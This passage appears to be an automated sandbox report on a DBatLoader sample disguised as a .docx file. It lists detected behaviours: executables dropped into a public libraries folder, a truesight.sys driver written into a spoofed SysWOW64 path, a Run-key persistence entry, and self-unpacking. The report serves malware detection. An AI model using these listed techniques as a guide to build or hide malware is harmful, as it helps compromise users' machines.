          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\Libraries\xzeheenC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277099019.0000000021778000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2226424806.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2277821297.000000002190E000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2383062167.0000000021300000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020833000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020820000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020793000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020780000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: _.pdb source: xzeheenC.pif, 00000004.00000002.3467561668.000000001CE1B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000003.2246468592.000000001B22B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3468182063.000000001D270000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000004.00000002.3471183670.000000001E2F1000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3474258234.0000000035551000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3474966321.0000000036AA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000009.00000002.3471014628.000000003428B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000009.00000003.2351649309.0000000032623000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000003.2424661790.000000002ED4E000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3471453220.0000000031D71000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468359572.0000000030CA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 0000000D.00000002.3468030849.00000000308EB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.00000000218B2000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020800000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000003.2227120369.00000000218E1000.00000004.00000020.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2274262219.0000000020820000.00000004.00001000.00020000.00000000.sdmp, D.G Governor Istek,Docx.exe, 00000000.00000002.2279806088.000000007F450000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000003.2338267499.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020793000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000002.2375761543.0000000020780000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000006.00000003.2338267499.0000000000773000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 0000000A.00000003.2418480318.000000000084F000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 0000000A.00000003.2418480318.0000000000826000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 4.2.xzeheenC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 9.2.xzeheenC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 13.2.xzeheenC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 4.2.xzeheenC.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 9.2.xzeheenC.pif.400000.0.unpack
          Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 13.2.xzeheenC.pif.400000.0.unpack
          Yara detected DBatLoader
          Source: Yara matchFile source: 0.2.D.G Governor Istek,Docx.exe.29c0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2280883342.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2245824423.0000000002366000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2157901937.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: xzeheenC.pif.0.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D87A0 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_029D87A0
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C32FC push eax; ret 0_2_029C3338
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029EC2FC push 029EC367h; ret 0_2_029EC35F
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C635C push 029C63B7h; ret 0_2_029C63AF
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C635A push 029C63B7h; ret 0_2_029C63AF
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029EC0AC push 029EC125h; ret 0_2_029EC11D
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029EC1F8 push 029EC288h; ret 0_2_029EC280
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029EC144 push 029EC1ECh; ret 0_2_029EC1E4
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D86C0 push 029D8702h; ret 0_2_029D86FA
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C673E push 029C6782h; ret 0_2_029C677A
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C6740 push 029C6782h; ret 0_2_029C677A
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029CC4F4 push ecx; mov dword ptr [esp], edx0_2_029CC4F9
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DE5B4 push ecx; mov dword ptr [esp], edx0_2_029DE5B9
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029CD528 push 029CD554h; ret 0_2_029CD54C
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029CCB56 push 029CCCFAh; ret 0_2_029CCCF2
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029CCB74 push 029CCCFAh; ret 0_2_029CCCF2
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029EBB6C push 029EBD94h; ret 0_2_029EBD8C
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D7894 push 029D7911h; ret 0_2_029D7909
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D68D0 push 029D697Bh; ret 0_2_029D6973
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D68CE push 029D697Bh; ret 0_2_029D6973
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DA91F push 029DA958h; ret 0_2_029DA950
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D8918 push 029D8950h; ret 0_2_029D8948
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D8916 push 029D8950h; ret 0_2_029D8948
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DA920 push 029DA958h; ret 0_2_029DA950
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D2EE8 push 029D2F5Eh; ret 0_2_029D2F56
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D5E04 push ecx; mov dword ptr [esp], edx0_2_029D5E06
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D2FF4 push 029D3041h; ret 0_2_029D3039
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029D2FF3 push 029D3041h; ret 0_2_029D3039
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_0041C40C push cs; iretd 4_2_0041C4E2
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_00423149 push eax; ret 4_2_00423179
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_0041C50E push cs; iretd 4_2_0041C4E2
          Source: C:\Users\Public\Libraries\xzeheenC.pifCode function: 4_2_004231C8 push eax; ret 4_2_00423179
          Source: 4.2.xzeheenC.pif.1d270f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 4.2.xzeheenC.pif.1f670000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 4.2.xzeheenC.pif.1ce5c896.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 4.2.xzeheenC.pif.1e2f6478.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 4.2.xzeheenC.pif.1e32e790.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
          Source: 9.2.xzeheenC.pif.3558e790.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

          Persistence and Installation Behavior

          barindex
          Drops PE files with a suspicious file extension
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeFile created: C:\Users\Public\Libraries\xzeheenC.pifJump to dropped file
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeFile created: C:\Users\Public\Libraries\Cneehezx.PIFJump to dropped file
          Sample is not signed and drops a device driver
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFFile created: C:\Windows \SysWOW64\truesight.sysJump to behavior
          Source: C:\Users\Public\Libraries\Cneehezx.PIFFile created: C:\Windows \SysWOW64\truesight.sys
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeFile created: C:\Users\Public\Libraries\xzeheenC.pifJump to dropped file
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeFile created: C:\Users\Public\Libraries\Cneehezx.PIFJump to dropped file
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CneehezxJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CneehezxJump to behavior
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029DA95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_029DA95C
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
